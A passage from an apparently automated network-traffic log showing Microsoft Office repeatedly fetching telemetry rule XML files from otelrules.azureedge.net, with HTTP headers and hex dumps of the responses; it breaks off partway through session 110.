                                                                                                                                                                                  2024-11-23 13:47:41 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  101192.168.2.44989313.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:42 UTC192OUTGET /rules/rule702351v1s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:42 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:42 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1395
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                  ETag: "0x8DC582BE017CAD3"
                                                                                                                                                                                  x-ms-request-id: aa1ebe18-101e-0017-5340-3c47c7000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134742Z-15b8b599d8885prmhC1TEBsnkw000000032g00000000cbxr
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:42 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  102192.168.2.44989413.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:42 UTC192OUTGET /rules/rule702350v1s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:43 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:43 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1358
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                                                                                                  ETag: "0x8DC582BE6431446"
                                                                                                                                                                                  x-ms-request-id: 962a21d8-701e-001e-0fb8-3bf5e6000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134743Z-15b8b599d88cn5thhC1TEBqxkn00000002t000000000h033
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:43 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  103192.168.2.44989613.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:42 UTC192OUTGET /rules/rule701251v1s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:43 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:43 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1395
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                                                                                                  ETag: "0x8DC582BDE12A98D"
                                                                                                                                                                                  x-ms-request-id: b9d90d28-901e-00a0-5d63-3b6a6d000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134743Z-178bfbc474bwh9gmhC1NYCy3rs00000004rg0000000002zq
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:43 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  104192.168.2.44989513.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:43 UTC192OUTGET /rules/rule701250v1s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:43 UTC495INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:43 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1358
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                  ETag: "0x8DC582BE022ECC5"
                                                                                                                                                                                  x-ms-request-id: 35b59cfb-401e-000a-22ae-3d4a7b000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134743Z-15b8b599d88g5tp8hC1TEByx6w00000002x000000000ezp3
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_MISS
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:43 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  105192.168.2.44989713.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:43 UTC192OUTGET /rules/rule700051v1s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:43 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:43 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1389
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                  ETag: "0x8DC582BE10A6BC1"
                                                                                                                                                                                  x-ms-request-id: 80a20124-101e-0046-4f43-3c91b0000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134743Z-15b8b599d88f9wfchC1TEBm2kc00000003600000000054h3
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:43 UTC1389INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  106192.168.2.44989813.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:44 UTC192OUTGET /rules/rule700050v1s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:45 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:45 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1352
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                                                                                                                  ETag: "0x8DC582BE9DEEE28"
                                                                                                                                                                                  x-ms-request-id: c76163b7-601e-0070-0647-3ca0c9000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134745Z-178bfbc474bpscmfhC1NYCfc2c000000030g00000000hhen
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:45 UTC1352INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  107192.168.2.44989913.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:45 UTC192OUTGET /rules/rule702951v1s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:45 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:45 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1405
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                  ETag: "0x8DC582BE12B5C71"
                                                                                                                                                                                  x-ms-request-id: b43d4aba-301e-0020-1845-3c6299000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134745Z-178bfbc474bmqmgjhC1NYCy16c00000004mg0000000093na
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:45 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  108192.168.2.44990013.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:45 UTC192OUTGET /rules/rule702950v1s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:45 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:45 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1368
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                                  ETag: "0x8DC582BDDC22447"
                                                                                                                                                                                  x-ms-request-id: 110996dd-801e-0048-7360-3bf3fb000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134745Z-178bfbc474bxkclvhC1NYC69g400000004e000000000b0a0
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:45 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 72 61 6e 73 6c 61 74 6f 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  109192.168.2.44990113.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:45 UTC192OUTGET /rules/rule701151v1s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:45 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:45 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1401
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                                                                                  ETag: "0x8DC582BE055B528"
                                                                                                                                                                                  x-ms-request-id: 07391f24-a01e-0032-508c-3a1949000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134745Z-178bfbc474bgvl54hC1NYCsfuw00000004kg000000005h67
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:45 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  110192.168.2.44990213.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:45 UTC192OUTGET /rules/rule701150v1s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
